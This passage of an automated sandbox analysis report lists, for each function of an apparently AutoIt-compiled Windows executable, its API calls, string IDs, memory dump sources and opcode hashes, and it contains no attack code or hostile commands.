                                                                                                                • Instruction Fuzzy Hash: 67615DB65043469FCB10EF20C84599EB7E8FF89310F04891AF999D7251EB31E945CBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                • CharLowerBuffW.USER32(?,?), ref: 00D8DB26
                                                                                                                • GetDriveTypeW.KERNEL32 ref: 00D8DB73
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D8DBBB
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D8DBF2
                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D8DC20
                                                                                                                  • Part of subcall function 00D47E53: _memmove.LIBCMT ref: 00D47EB9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                • API String ID: 2698844021-4113822522
                                                                                                                • Opcode ID: 1ce1acd51b56becb8e88024aefeaa1e31607701819e5082eca5aa4f15b1d4fcc
                                                                                                                • Instruction ID: 26ac6ca36337d0b9f6c4af14bdc5a2db7efdd093303824b7c2a7976d4e6e3315
                                                                                                                • Opcode Fuzzy Hash: 1ce1acd51b56becb8e88024aefeaa1e31607701819e5082eca5aa4f15b1d4fcc
                                                                                                                • Instruction Fuzzy Hash: 28514A711083059FC700EF10C89186AB7F9EF88758F55896CF89A972A1DB31EE09CBB1
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DB4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00D83145
                                                                                                                • LoadStringW.USER32(00000000,?,00DB4085,00000016), ref: 00D8314E
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00DB4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00D83170
                                                                                                                • LoadStringW.USER32(00000000,?,00DB4085,00000016), ref: 00D83173
                                                                                                                • __swprintf.LIBCMT ref: 00D831B3
                                                                                                                • __swprintf.LIBCMT ref: 00D831C5
                                                                                                                • _wprintf.LIBCMT ref: 00D8326C
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D83283
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                • API String ID: 984253442-2268648507
                                                                                                                • Opcode ID: dd50c7f71e990470b7599363a15a77f0f65592daab0c66c24835280950bff5b9
                                                                                                                • Instruction ID: 38fc58ad6449fcda9781885758323e539f3c8e76eb6e61f368b2e337aa12b0e3
                                                                                                                • Opcode Fuzzy Hash: dd50c7f71e990470b7599363a15a77f0f65592daab0c66c24835280950bff5b9
                                                                                                                • Instruction Fuzzy Hash: AA411D72940209ABCB14FBA4DD97EEEB779EF14B00F104065B205B20A2EA756F08CB71
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00D8D96C
                                                                                                                • __swprintf.LIBCMT ref: 00D8D98E
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D8D9CB
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00D8D9F0
                                                                                                                • _memset.LIBCMT ref: 00D8DA0F
                                                                                                                • _wcsncpy.LIBCMT ref: 00D8DA4B
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00D8DA80
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00D8DA8B
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 00D8DA94
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00D8DA9E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 2733774712-3457252023
                                                                                                                • Opcode ID: 534d316a28256a5034e7c3e7c28c22094874cad15291b22c7829c0e7cae55c68
                                                                                                                • Instruction ID: 1cb3b99a321eda1ff49f9646312ee416dec7b309e4773fa2995c45010f34f9ef
                                                                                                                • Opcode Fuzzy Hash: 534d316a28256a5034e7c3e7c28c22094874cad15291b22c7829c0e7cae55c68
                                                                                                                • Instruction Fuzzy Hash: 5C31A672600209BBDB20EFA4DC49FEA77BDEF84700F1481A5F559D61A0E770DA458BB1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                                                                • String ID:
                                                                                                                • API String ID: 884005220-0
                                                                                                                • Opcode ID: 9fab550595874e360d0b08eb4377d25b2cf6fa78b8f1165010bbba7d6e0571f2
                                                                                                                • Instruction ID: a465178e9a625fc801c2ac2592eb24ba4c15c739bcb2b6901202c4881d2c25b4
                                                                                                                • Opcode Fuzzy Hash: 9fab550595874e360d0b08eb4377d25b2cf6fa78b8f1165010bbba7d6e0571f2
                                                                                                                • Instruction Fuzzy Hash: BE611373901605AFDB255F38DC52B6DB7A4EF11720F288229E809AB1C1FB35DC418BB5
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00DAE564
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00DAE57B
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00DAE586
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00DAE593
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00DAE59C
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DAE5AB
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00DAE5B4
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00DAE5BB
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00DAE5CC
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DCD9BC,?), ref: 00DAE5E5
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00DAE5F5
                                                                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 00DAE619
                                                                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00DAE644
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00DAE66C
                                                                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DAE682
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 3840717409-0
                                                                                                                • Opcode ID: d84c8f5085fdeee7044d175c207743bca777f13cc7edcdf7e907b88583467295
                                                                                                                • Instruction ID: 856eae2bd3d1478060eb38a2a02e9ab6782fd177fc9a7d1ce7d4e2a5571de9b0
                                                                                                                • Opcode Fuzzy Hash: d84c8f5085fdeee7044d175c207743bca777f13cc7edcdf7e907b88583467295
                                                                                                                • Instruction Fuzzy Hash: 3A415A75A00306BFDB119F65DC88EAABBBAEF8A715F148468F906D7260D7309D01DB70
                                                                                                                APIs
                                                                                                                • __wsplitpath.LIBCMT ref: 00D90C93
                                                                                                                • _wcscat.LIBCMT ref: 00D90CAB
                                                                                                                • _wcscat.LIBCMT ref: 00D90CBD
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00D90CD2
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D90CE6
                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00D90CFE
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D90D18
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00D90D2A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 34673085-438819550
                                                                                                                • Opcode ID: dc9f190a91f095b19ba95d39ba7613127bd9fd800b2172f7d753ae05d2926f47
                                                                                                                • Instruction ID: bba93fe1db4df61dc6e1a45e1aa4e67a326318a603f02f185779220ef81781ef
                                                                                                                • Opcode Fuzzy Hash: dc9f190a91f095b19ba95d39ba7613127bd9fd800b2172f7d753ae05d2926f47
                                                                                                                • Instruction Fuzzy Hash: 668193715043059FCF64DF64D8449AABBE9EF89314F18892AF889C7251E734ED84CBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DAED0C
                                                                                                                • GetFocus.USER32 ref: 00DAED1C
                                                                                                                • GetDlgCtrlID.USER32(00000000), ref: 00DAED27
                                                                                                                • _memset.LIBCMT ref: 00DAEE52
                                                                                                                • GetMenuItemInfoW.USER32 ref: 00DAEE7D
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 00DAEE9D
                                                                                                                • GetMenuItemID.USER32(?,00000000), ref: 00DAEEB0
                                                                                                                • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00DAEEE4
                                                                                                                • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00DAEF2C
                                                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00DAEF64
                                                                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00DAEF99
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1296962147-4108050209
                                                                                                                • Opcode ID: 3e15154e005620f3f2728c6813c016eb16198171410b129e30bd563ec3ecf1cc
                                                                                                                • Instruction ID: 9127ae72796024e0c352f400f59298355a7a3d11aee3ed9d32b58425c356c63e
                                                                                                                • Opcode Fuzzy Hash: 3e15154e005620f3f2728c6813c016eb16198171410b129e30bd563ec3ecf1cc
                                                                                                                • Instruction Fuzzy Hash: B5817B71208312AFDB10DF14C884A6BBBE9FF8A354F04492DF99997291D730DA45CBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00D7B903
                                                                                                                  • Part of subcall function 00D7B8E7: GetLastError.KERNEL32(?,00D7B3CB,?,?,?), ref: 00D7B90D
                                                                                                                  • Part of subcall function 00D7B8E7: GetProcessHeap.KERNEL32(00000008,?,?,00D7B3CB,?,?,?), ref: 00D7B91C
                                                                                                                  • Part of subcall function 00D7B8E7: HeapAlloc.KERNEL32(00000000,?,00D7B3CB,?,?,?), ref: 00D7B923
                                                                                                                  • Part of subcall function 00D7B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00D7B93A
                                                                                                                  • Part of subcall function 00D7B982: GetProcessHeap.KERNEL32(00000008,00D7B3E1,00000000,00000000,?,00D7B3E1,?), ref: 00D7B98E
                                                                                                                  • Part of subcall function 00D7B982: HeapAlloc.KERNEL32(00000000,?,00D7B3E1,?), ref: 00D7B995
                                                                                                                  • Part of subcall function 00D7B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00D7B3E1,?), ref: 00D7B9A6
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00D7B5F7
                                                                                                                • _memset.LIBCMT ref: 00D7B60C
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00D7B62B
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00D7B63C
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00D7B679
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00D7B695
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00D7B6B2
                                                                                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00D7B6C1
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00D7B6C8
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00D7B6E9
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00D7B6F0
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00D7B721
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00D7B747
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00D7B75B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3996160137-0
                                                                                                                • Opcode ID: 1df70fad046a08cd583a41575560828237391596d042d972805261c47e986ee1
                                                                                                                • Instruction ID: 2b06b4f166836ad2142851aab5ca5df1395c46ae5187bd0eb2250f068a878e45
                                                                                                                • Opcode Fuzzy Hash: 1df70fad046a08cd583a41575560828237391596d042d972805261c47e986ee1
                                                                                                                • Instruction Fuzzy Hash: 85513C7590020AAFDF049FA4DC45EEEBB79FF44354F04816AE919EB290EB319A05DB70
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00D9A2DD
                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00D9A2E9
                                                                                                                • CreateCompatibleDC.GDI32(?), ref: 00D9A2F5
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00D9A302
                                                                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00D9A356
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00D9A392
                                                                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00D9A3B6
                                                                                                                • SelectObject.GDI32(00000006,?), ref: 00D9A3BE
                                                                                                                • DeleteObject.GDI32(?), ref: 00D9A3C7
                                                                                                                • DeleteDC.GDI32(00000006), ref: 00D9A3CE
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 00D9A3D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                • String ID: (
                                                                                                                • API String ID: 2598888154-3887548279
                                                                                                                • Opcode ID: 7e07f62a31694f7d89f66d236099ecda98f3cf430105310443c9cedacf3b7b5b
                                                                                                                • Instruction ID: 4ffcd3f75db275388b1a078d9a8de7263365c80a09e3db3f536c5836a208a3e0
                                                                                                                • Opcode Fuzzy Hash: 7e07f62a31694f7d89f66d236099ecda98f3cf430105310443c9cedacf3b7b5b
                                                                                                                • Instruction Fuzzy Hash: F6513B7690030AAFDB15CFA8CC84EAEBBB9EF48310F14841DF99597350D731A941CBA0
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DB3C64,00000010,00000000,Bad directive syntax error,00DDDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00D832D1
                                                                                                                • LoadStringW.USER32(00000000,?,00DB3C64,00000010), ref: 00D832D8
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • _wprintf.LIBCMT ref: 00D83309
                                                                                                                • __swprintf.LIBCMT ref: 00D8332B
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D83395
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"
                                                                                                                • API String ID: 1506413516-3476811254
                                                                                                                • Opcode ID: 5796cf6ad0326199a0f8701eff3cee8138b20ed2b496d3a8835adead40b1fe5b
                                                                                                                • Instruction ID: f2764685592ec7144af4cf302efe1b2bccdf27eac1360cdf2aaa17ee46f99a07
                                                                                                                • Opcode Fuzzy Hash: 5796cf6ad0326199a0f8701eff3cee8138b20ed2b496d3a8835adead40b1fe5b
                                                                                                                • Instruction Fuzzy Hash: 6F21273185021EBBCF11EF90CC4AEEE7775FF28700F004456B619A10A2EA76AB58DB70
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00D85FF5
                                                                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00D86082
                                                                                                                • GetMenuItemCount.USER32(00E018F0), ref: 00D8610B
                                                                                                                • DeleteMenu.USER32(00E018F0,00000005,00000000,000000F5,?,?), ref: 00D8619B
                                                                                                                • DeleteMenu.USER32(00E018F0,00000004,00000000), ref: 00D861A3
                                                                                                                • DeleteMenu.USER32(00E018F0,00000006,00000000), ref: 00D861AB
                                                                                                                • DeleteMenu.USER32(00E018F0,00000003,00000000), ref: 00D861B3
                                                                                                                • GetMenuItemCount.USER32(00E018F0), ref: 00D861BB
                                                                                                                • SetMenuItemInfoW.USER32(00E018F0,00000004,00000000,00000030), ref: 00D861F1
                                                                                                                • GetCursorPos.USER32(?), ref: 00D861FB
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00D86204
                                                                                                                • TrackPopupMenuEx.USER32(00E018F0,00000000,?,00000000,00000000,00000000), ref: 00D86217
                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00D86223
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3993528054-0
                                                                                                                • Opcode ID: f2f1aa970d31de93f3e405d444630a8a531f62dc136e74f7ebe8a952596e0e37
                                                                                                                • Instruction ID: 60a6e5102f5d7c777cd538a6ff7eccd5286d2bcf9a2e7e3572a2589b1cb55064
                                                                                                                • Opcode Fuzzy Hash: f2f1aa970d31de93f3e405d444630a8a531f62dc136e74f7ebe8a952596e0e37
                                                                                                                • Instruction Fuzzy Hash: 1871E670640216BFEB20AB54DC49FAABF64FF01774F184216F614AA1D1C7B1E850CBB5
                                                                                                                APIs
                                                                                                                • LoadStringW.USER32(00000066,?,00000FFF), ref: 00D8D567
                                                                                                                  • Part of subcall function 00D4CAEE: _memmove.LIBCMT ref: 00D4CB2F
                                                                                                                • LoadStringW.USER32(?,?,00000FFF,?), ref: 00D8D589
                                                                                                                • __swprintf.LIBCMT ref: 00D8D5DC
                                                                                                                • _wprintf.LIBCMT ref: 00D8D68D
                                                                                                                • _wprintf.LIBCMT ref: 00D8D6AB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
